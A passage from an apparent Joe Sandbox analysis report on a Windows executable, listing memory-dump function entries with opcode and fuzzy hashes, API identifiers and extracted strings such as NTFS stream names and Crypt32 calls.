                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapProcess
                                                                                        • String ID:
                                                                                        • API String ID: 54951025-0
                                                                                        • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                        • Instruction ID: 01923c81e9f7d864f44aed0f145e3ddf2ae34dce080abc101ee923c3d38dff35
                                                                                        • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                        • Instruction Fuzzy Hash: 98B09224F17E02C2EB08AB166C8229426A4BFA8B00F94A078E11CC1360EE3C30AA4B00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                                                        • Instruction ID: 567a8cccf76c4670024149d0b4765f1e3649c35b6571199964513c550561e62b
                                                                                        • Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                                                        • Instruction Fuzzy Hash: A482E5A2E496C186D715CF26D4442BC7F61E7A5F84F19813AEA6E873C5EE3CD849C310
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                        • Instruction ID: 505aa6deba3dbf66c595b0aff7ab16a8dcacf0f63054b350009235a1d4f6c582
                                                                                        • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                        • Instruction Fuzzy Hash: 72628D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                                                        • Instruction ID: f2748e8075d2b26b06b70d8de143343c0069ec2197585a795d037f2f98cfec09
                                                                                        • Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                                                        • Instruction Fuzzy Hash: 7482F1B3E096C18AD725CE29D4446FC7B61F7A6F48F088136DA6D87789EE3C9489C710
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                        • Instruction ID: d2387d782abcd6d828d6c4d60e241f382c66243435dca91ca986e0a7669a54e8
                                                                                        • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                        • Instruction Fuzzy Hash: 6D22E473B246508BD728CF25C89AE5E3766F798744B4B8228DF0ACB789DB38D505CB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                        • Instruction ID: 32eb3ef7f05ab90e0ebb09f53edacea3ba6e15af9f6539d95ac483edd11a1d9a
                                                                                        • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                        • Instruction Fuzzy Hash: C332B472E085918BE718CF25D5506BC3BA1F7A5B48F058139EA5A87BC4EF3CE869C740
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                        • Instruction ID: 77440548732f795ef4e7d84f25594f4663a73ebe2a67ce41d289d08d40dd43b8
                                                                                        • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                                        • Instruction Fuzzy Hash: FEC18BB7F281908FE350CF6AE440A9D3BB1F39878CB515125EF69A3B09D639E645CB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                        • Instruction ID: 557ad07ce5d51b527a56837c03588ed8bc64be5999fc3e8d502589dfa59cff04
                                                                                        • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                                        • Instruction Fuzzy Hash: 4AA14373E4818246EB25CA26D4447FD2A81EBF1B44F054235EE6E877C6EE3CE889D300
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                        • Instruction ID: af06a4cde0e9f831df26cb079ef1f0806e0dec9d91a89c9f48a4d86b74475d69
                                                                                        • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                                        • Instruction Fuzzy Hash: B5C11677E291E44DE302CBB6A4248FD3FB1E75E30DB4A4251EFA656B4ED5285201DB20
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                        • Instruction ID: d0560f3a76d77e63af34ad175d523b3780227651dc30b0b8d08bfb1eec149850
                                                                                        • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                                        • Instruction Fuzzy Hash: D4910F62F1858196EB11CF2AD4516ED6B21FFA5B88F441131FF5E87B89EE38E646C300
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                        • Instruction ID: 7248d81ca72f140214642db65af8d26d7bf812407c02b83b3db55bdaf6d9d898
                                                                                        • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                                        • Instruction Fuzzy Hash: DB613A63F085D549EB21CF7685008FD7FB1E7A9784B454132EEAA9368AEE3CE505CB10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                        • Instruction ID: 3908e9e529f214a1db7aea94a12623dc752c796bb1023c770b4b209b69e4b4cd
                                                                                        • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                                        • Instruction Fuzzy Hash: 8351E073E181514BE728CF2AA0147BD3B52FBE4B48F444135EA59876C9EE3DE549DB00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                        • Instruction ID: 1ca0d0910f7ab9ee4b4137fa58ba3083a1b7bc6417cc7e9e86c414c32459af84
                                                                                        • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                                        • Instruction Fuzzy Hash: 8E31D2A2E085914BD718CE2795906BE7B91B7D4780F048139EF5AC3B81EE3CE055C700
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                        • Instruction ID: 118b66d465a846eb5efcdb52d680f7976dce2da694b4100fea783c8acaf615f8
                                                                                        • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                        • Instruction Fuzzy Hash: 65F0FE65F1C00B42FB68802A581933D18569BB1310FD4883DF13FC62CDFDADE8815209
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1684667266.00007FF6FE181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FE180000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1684493142.00007FF6FE180000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1684871823.00007FF6FE1C8000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1DB000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685300240.00007FF6FE1E4000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EA000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1685627077.00007FF6FE1EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff6fe180000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
• Instruction ID: 38aaadc824a44f066c8e88fedce7b6d6ca36ebf22ab4908d8c9332b0778b1b08
• Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
• Instruction Fuzzy Hash: AAA00161E08842D0E745CB16E8A04B12A20BBA0700B502031F02DC15E4AE7CA4128204
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
• API String ID: 3668304517-727060406
• Opcode ID: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
• Instruction ID: 2dca5259fa37506eda555c91edf7e38ddd851a005f951c396f20fae8e3d3e660
• Opcode Fuzzy Hash: 9722f19d9730c17eaeca2eefbf6c05556aeae8c55d78850e8e2a1aeae63cce70
• Instruction Fuzzy Hash: B741DA36F05B0599EB00CF66D4803E937A9FB98798F400136EA6D837A4EF38E159C344
APIs
Strings
Similarity
• API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
• String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 2565136772-3242537097
• Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
• Instruction ID: 1bde42bd04a3a15753a4b55bfbb5c2f10e5c1619892bd56892628a4175fa29da
• Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
• Instruction Fuzzy Hash: CF21EE64F19A5385EB55DB67E8555B52BA0AFE4B80F481435F92EC2BE0FF3CB449C200
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
• String ID: DXGIDebug.dll$UNC$\\?\
• API String ID: 4097890229-4048004291
• Opcode ID: 2db35b7fd120c14e1a3842301d791596da2df3f6a2df10038d8e32577e88f225
• Instruction ID: 05a10a7edc481aee13b3b798f2427b5eeab4eaf49d992f93fa38004e2e796e63
• Opcode Fuzzy Hash: 2db35b7fd120c14e1a3842301d791596da2df3f6a2df10038d8e32577e88f225
• Instruction Fuzzy Hash: FF12C222F09B4280EB10DB66D4441AD6B71EBE5B98F504236EB6D87BE9EF3CD549C340
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
• String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 2868844859-1533471033
• Opcode ID: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
• Instruction ID: 788e51f0876ae6c4c76205ad5f28489e8ac754d51282fdbf1fc3f4e9c45cec97
• Opcode Fuzzy Hash: b0a568968ba406e2562f5405558042a856f124114ebc2f236df8f8f8fbeda86d
• Instruction Fuzzy Hash: 29817F62F19A4285FB01DBA6D4401FD2B71AFA9B94F404135EE2D976EAFE38D50AC340
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
• API String ID: 3215553584-2617248754
• Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
• Instruction ID: 5e3f56b4c28cf03e2cf16aca26512414fee8543b6811e768e5e84e669fea7ce2
• Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
• Instruction Fuzzy Hash: C341A072F09B4589E704CF26E8417E93BA4EBA8394F014536EE6D83B94EE3CD425C344
APIs
Strings
Similarity
• API ID: Window$MessageObjectSend$ClassDeleteLongName
• String ID: STATIC
• API String ID: 2845197485-1882779555
• Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
• Instruction ID: 892da3028adf5cd44320597d57179b4b4adcab2e8ecc41e2dd1bab7678f960a0
• Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
• Instruction Fuzzy Hash: 52315225F08A4246FB60DB13A9547BA6B91ABE9BD0F040434FD6D87BD5EE3CE4498740
Strings
Similarity
• API ID: ItemTextWindow
• String ID: LICENSEDLG
• API String ID: 2478532303-2177901306
• Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
• Instruction ID: 0fb30094362acfa5d0ae684aeaad5c8e563b6e6657fe18acd111204aa12e1a12
• Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
• Instruction Fuzzy Hash: CC416325E08A5282FB64CB17E8547791BA1AFE4F84F044135F92E83BD4EF7CE54A8300
APIs
Strings
Similarity
• API ID: AddressProc$CurrentDirectoryProcessSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
• API String ID: 2915667086-2207617598
• Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
• Instruction ID: 835941d4451df956dae3a25905658ab8f1667678a258eb28d6ceb992bdad690a
• Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
• Instruction Fuzzy Hash: C231F624E0AA4A80FB24CF17E9585792BA1AFE5B90F045135F86EC77E8FE7CF5458204
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID: $
• API String ID: 3668304517-227171996
• Opcode ID: d36d35de43213f8ad8c7125845a4b947406c7f49c70316df392fd487e7cb45ba
• Instruction ID: 8736331ee4c4d4c745339ef82da44396d422e9140b9d6122239c17f3f5c6c1c0
• Opcode Fuzzy Hash: d36d35de43213f8ad8c7125845a4b947406c7f49c70316df392fd487e7cb45ba
• Instruction Fuzzy Hash: E1F1AD62F1574640EF10DB66D4481BC2B62ABE4FA8F505231EA7D93BD9EE7CE188C340
APIs
Strings
Similarity
• API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 2940173790-393685449
• Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
• Instruction ID: 21af108181a095064492407cb24469732c940d6e1000f77d88f29028fa51c47e
